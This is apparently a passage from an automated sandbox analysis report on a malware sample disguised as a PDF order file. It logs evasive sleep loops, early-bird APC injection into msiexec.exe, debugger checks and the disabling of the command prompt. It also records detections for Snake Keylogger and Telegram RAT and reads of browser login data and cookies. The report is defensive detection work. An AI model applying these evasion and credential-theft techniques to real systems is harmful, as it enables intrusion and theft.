Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599657 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599532 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598786 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598563 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597735 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597610 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597485 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597360 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596717 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596327 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596030 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595813 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595688 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595344 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594985 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594860 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594735 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594485 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594110 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 593985 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 593860 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 593735 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6706 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3085 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -31359464925306218s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8184 Thread sleep count: 1764 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8184 Thread sleep count: 8064 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -599657s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -599532s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -599422s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -599063s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -598786s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -598672s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -598563s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -598344s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -598235s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -598110s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -597985s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -597860s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -597735s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -597610s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -597485s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -597360s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -597235s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -597110s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -596985s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -596860s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -596717s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -596610s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -596485s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -596327s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -596156s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -596030s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -595922s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -595813s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -595688s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -595578s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -595469s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -595344s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -595235s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -595110s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -594985s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -594860s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -594735s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -594610s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -594485s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -594360s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -594235s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -594110s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -593985s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -593860s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180 Thread sleep time: -593735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_00406448 FindFirstFileA,FindClose, 0_2_00406448
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040589C
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_004027A1 FindFirstFileA, 0_2_004027A1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599657 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599532 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598786 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598563 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597735 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597610 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597485 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597360 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596717 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596327 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596030 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595813 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595688 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595344 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594985 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594860 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594735 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594485 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594110 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 593985 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 593860 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 593735 Jump to behavior
Source: msiexec.exe, 00000006.00000002.2943801242.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW5
Source: msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd0b53820095de<
Source: msiexec.exe, 00000006.00000002.2943801242.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2943801242.0000000000C37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Early bird code injection technique detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4220000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403325

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disables CMD prompt
Source: C:\Windows\SysWOW64\msiexec.exe Registry value created: DisableCMD 1 Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8044, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
